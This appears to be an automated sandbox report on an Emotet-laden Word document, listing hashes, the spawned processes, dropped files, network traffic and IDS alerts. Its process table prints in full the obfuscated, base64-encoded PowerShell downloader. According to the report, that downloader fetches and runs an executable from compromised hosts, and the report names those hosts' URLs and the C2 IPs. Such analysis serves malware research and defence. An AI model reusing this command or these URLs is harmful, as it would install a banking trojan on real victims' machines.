download: | 201904 |
Full analysis: | https://app.any.run/tasks/9bb9643e-e0b9-451c-a8ed-b4e0d07e10b9 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | April 14, 2019, 19:42:10 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Apr 12 06:35:00 2019, Last Saved Time/Date: Fri Apr 12 06:35:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 12, Security: 0 |
MD5: | 59C3FD6DF92FFBD97ED4A82F632E1A40 |
SHA1: | E700C1E7175DD1FB8F6D8A59A3C454FF7CF04C42 |
SHA256: | AB80799E4EB0B2F4F44A4EA326B87CA16E2FFD1FB7CA60691CB2E338FCA8C147 |
SSDEEP: | 6144:R77HUUUUUUUUUUUUUUUUUUUT52VO+DR3aNmDy5gepRo/v3Dh:R77HUUUUUUUUUUUUUUUUUUUTC1DR3aNC |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 12 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 12 |
Words: | 1 |
Pages: | 1 |
ModifyDate: | 2019:04:12 05:35:00 |
CreateDate: | 2019:04:12 05:35:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2604 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\201904.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
2404 | PoWeRsHelL -e JABCAEEAQQBaAFgAQQBEAD0AKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAQQAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcARABBACcALAAnAHQAYwB3ACcAKQApADsAJABMAGMAYwBRADEAQQAgAD0AIAAnADQAOAAwACcAOwAkAFoAeABjAHgAMQB4AEcAPQAoACIAewAwAH0AewAyAH0AewAxAH0AIgAtAGYAJwBPAEcAJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBCACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAEEAJwAsACcAQgBHAEEAJwApACkALAAnAFUAJwApADsAJAB6AHcAQgBBAEEAQQBRAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABMAGMAYwBRADEAQQArACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwAuAGUAJwAsACcAeABlACcAKQA7ACQAegBRAEEAXwBDAEIAPQAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBBACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBCAEEAJwAsACcAQQBaACcAKQAsACcAYwBYACcAKQApADsAJABWAEQAdwA0AEEARABVAEEAPQAuACgAJwBuAGUAdwAtAG8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACcAKQAgAE4AZQBgAFQALgBgAHcAZQBCAEMATABpAEUAbgB0ADsAJABpAFEAQgBBAGMAbwA9ACgAIgB7ADMAMgB9AHsAMgAyAH0AewAxADIAfQB7ADQAfQB7ADIANgB9AHsAOQB9AHsAMQAzAH0AewAyADkAfQB7ADAAfQB7ADIAMAB9AHsAMgB9AHsAMgA3AH0AewAyADgAfQB7ADYAfQB7ADEAOAB9AHsAMgAzAH0AewA1AH0AewAzADUAfQB7ADgAfQB7ADIAMQB9AHsAMQAxAH0AewAzADQAfQB7ADcAfQB7ADEAfQB7ADEANgB9AHsAMQA3AH0AewAyADQAfQB7ADMANgB9AHsAMQA0AH0AewAxADAAfQB7ADMAMAB9AHsAMwAzAH0AewAzADEAfQB7ADEANQB9AHsAMgA1AH0AewAzAH0AewAxADkAfQAiACAALQBmACAAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBAACcALAAnAFIASAAvACcAKQAsACcAcQAnACwAKAAiAHsAMQB9AHsAMgB9AHsAMwB9AHsAMAB9ACIAIAAtAGYAIAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAaQBjAG8AJwAsACcAbQAnACkALAAnAHAAOgAnACwAJwAvACcALAAnAC8AZgB1ACcAKQAsACgAIgB7ADQAfQB7ADAAfQB7ADUAfQB7ADIAfQB7ADEAfQB7ADMAfQAiACAALQBmACcAcQAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAUAAnACwAJwBIAHMAegAnACkALAAnAFIAJwAsACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAnAGYARgAvAGQAJwAsACcAdwAnACwAJwAtACcAKQAsACcAcwAnACwAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBfAHQAZABlACcALAAnAGcAawBPACcALAAnAEkAJwApACkALAAnAGUAJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcALwAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBoAHQAdABwADoAJwAsACcAQAAnACkAKQAsACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiAC0AZgAnAC4AYwBvACcALAAnAG0ALwAnACwAJwB3AGIAJwApACwAJwBSAFgALwAnACwAJwBjACcALAAnAG8AJwAsACcAbABFACcALAAnADIAJwAsACcAbgBuACcALAAnAHIAdQBtACcALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAaQBuAC8AJwAsACcAbQAnACkALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAMgAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAFAAJwAsACcAdQBnAC0AJwApACkALAAoACIAewAyAH0AewAzAH0AewAwAH0AewA1AH0AewAxAH0AewA0AH0AIgAtAGYAIAAnADoAJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAG4AZABhACcALAAnAHIAYgBvACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBXAC8AJwAsACcAQABoAHQAJwApACwAJwB0AHAAcwAnACwAJwBuAGkAJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwAvAHMAdQAnACwAJwAvACcAKQApACwAJwB0AC4AYwAnACwAJwBsAGUAdgAnACwAJwB2AEsALwAnACwAJwBoAHQAdAAnACwAJwBvAG0ALwAnACwAKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAYQB1AHMAcwAnACwAJwAvACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBlAHMAYwAnACwAJwBpACcAKQAsACcAYQAnACkALAAoACIAewA1AH0AewAxAH0AewAzAH0AewAwAH0AewAyAH0AewA0AH0AIgAgAC0AZgAgACcAYwBrACcALAAnADUALQB2ACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnADQAaQBoACcALAAnAGsALwAnACkALAAnAHAAJwAsACcAMgAvACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBwAG8AeAAnACwAJwAtADYAJwApACkALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAYwBnAGkAJwAsACcAbwBtAC8AJwApACwAKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIAIAAtAGYAJwB1AHkAJwAsACcAcQAzACcALAAnAFEAMwBOACcAKQAsACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAnAG0ALwBmACcALAAnAHIAcwAnACwAJwAuAGMAbwAnACkALAAnAGwAYwAnACwAJwBhAGwAaQAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwAvADEAJwAsACcASQBYAFEAJwApACwAJwBIACcALAAoACIAewAyAH0AewAwAH0AewAxAH0AIgAgAC0AZgAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAHoAJwAsACcAcABhAC4AeAB5ACcAKQAsACcALwBoAEoAJwAsACcAdQAnACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAaAB0ACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcALwAnACwAJwB0AHAAOgAnACkAKQAsACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcALwAnACwAJwA6AC8AJwAsACcAQABoAHQAdABwACcAKQAsACcALwAnACwAJwBhACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnADkAMgAnACwAJwA2ADEAJwApACwAKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAHoAYQAnACwAJwB5AG4ALgAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwAvAGEAegBlAGQAJwAsACcAaQAnACkAKQAsACcALQBiACcAKQAuACIAUwBQAGwAYABpAHQAIgAoACcAQAAnACkAOwAkAFMAeABjAFUAQQBCAFEAPQAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBjACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAEEAQQBBAEcAJwAsACcAbwAnACkALAAnAFUAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABZAGsAYwBYAHgAWABBACAAaQBuACAAJABpAFEAQgBBAGMAbwApAHsAdAByAHkAewAkAFYARAB3ADQAQQBEAFUAQQAuACIAZABgAE8AVwBOAEwATwBBAGAAZABmAEkAbABFACIAKAAkAFkAawBjAFgAeABYAEEALAAgACQAegB3AEIAQQBBAEEAUQApADsAJABmAFUAUQBBAF8AQQBfAEcAPQAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAgACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAEEAQgBBACcALAAnAFgAJwApACwAJwBDAEEAJwAsACcAYwAnACkAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAegB3AEIAQQBBAEEAUQApAC4AIgBMAEUAYABOAGAARwB0AGgAIgAgAC0AZwBlACAAMgAzADAAMgAxACkAIAB7AC4AKAAnAEkAbgB2AG8AawBlACcAKwAnAC0AJwArACcASQB0ACcAKwAnAGUAbQAnACkAIAAkAHoAdwBCAEEAQQBBAFEAOwAkAEcAdwBBAFUAUQBBAEEAMQA9ACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAbwAxAEEAJwAsACcAUQBBADEAJwApADsAYgByAGUAYQBrADsAJABjAEEAQQBBAG8AMQA9ACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiACAALQBmACAAJwBVACcALAAnAGMAJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBrACcALAAnADEAVQBEACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJAByAFUAQQBBAFoAMQA0AD0AKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAQwBBACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAEEAbwAnACwAJwBVAEEAJwApACkA | C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHelL.exe | WmiPrvSE.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3096 | "C:\Users\admin\480.exe" | C:\Users\admin\480.exe | — | PoWeRsHelL.exe |
User: admin Company: Slacker Integrity Level: MEDIUM Description: SlackerJukeboxLaunch Exit code: 0 Version: 2.1.2370.0000 | ||||
2760 | --b378b3aa | C:\Users\admin\480.exe | 480.exe | |
User: admin Company: Slacker Integrity Level: MEDIUM Description: SlackerJukeboxLaunch Exit code: 0 Version: 2.1.2370.0000 | ||||
2368 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 480.exe | |
User: admin Company: Slacker Integrity Level: MEDIUM Description: SlackerJukeboxLaunch Exit code: 0 Version: 2.1.2370.0000 | ||||
760 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Company: Slacker Integrity Level: MEDIUM Description: SlackerJukeboxLaunch Version: 2.1.2370.0000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2604 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR63EC.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2404 | PoWeRsHelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L8VZM9AW0KICP0YX4GEM.temp | — | |
MD5:— | SHA256:— | |||
2604 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFA1920AC612614D92.TMP | — | |
MD5:— | SHA256:— | |||
2604 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFC20686E5718CCA21.TMP | — | |
MD5:— | SHA256:— | |||
2604 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFF95DB61C163390F6.TMP | — | |
MD5:— | SHA256:— | |||
2604 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{671F1144-E375-4D61-B418-A02EF314FD8D}.tmp | — | |
MD5:— | SHA256:— | |||
2604 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF9C4CFB9F194B7861.TMP | — | |
MD5:— | SHA256:— | |||
2604 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E9F06D18-8A82-4417-9867-ADD0D2FF7AA4}.tmp | — | |
MD5:— | SHA256:— | |||
2604 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:03F75A861CC10AD1C3318BEB891B725B | SHA256:7EBE4AE513B230A4E93B55D5C5B1A8281E935A6A42B38FA33B58EA5B73980E58 | |||
2604 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:72C77A14379FE81201EDB9B921AC4E00 | SHA256:8252FF1DF324016A31ABED12768ABE77FE2C2BC545B20897CAD948A06F108634 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2404 | PoWeRsHelL.exe | GET | 404 | 103.18.109.161:80 | http://aussiescanners.com/forum/1IXQRH/ | AU | html | 7.90 Kb | malicious |
2404 | PoWeRsHelL.exe | GET | 200 | 190.8.176.146:80 | http://fumicolcali.com/wblev-6pox5-vpckk/4ih2/ | CO | executable | 123 Kb | suspicious |
760 | soundser.exe | POST | — | 187.188.166.192:80 | http://187.188.166.192/mult/devices/ringin/ | MX | — | — | malicious |
760 | soundser.exe | POST | 200 | 88.215.2.29:80 | http://88.215.2.29/window/ban/ringin/ | GB | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2404 | PoWeRsHelL.exe | 103.18.109.161:80 | aussiescanners.com | Net Virtue Pty Ltd | AU | malicious |
2404 | PoWeRsHelL.exe | 190.8.176.146:80 | fumicolcali.com | Colombia Hosting | CO | malicious |
760 | soundser.exe | 187.188.166.192:80 | — | TOTAL PLAY TELECOMUNICACIONES SA DE CV | MX | malicious |
760 | soundser.exe | 88.215.2.29:80 | — | Gamma Telecom Holdings Ltd | GB | malicious |
Domain | IP | Reputation |
---|---|---|
aussiescanners.com |
| malicious |
fumicolcali.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2404 | PoWeRsHelL.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2404 | PoWeRsHelL.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2404 | PoWeRsHelL.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2404 | PoWeRsHelL.exe | Misc activity | ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) |
760 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 8 |
760 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
760 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 23 |
760 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |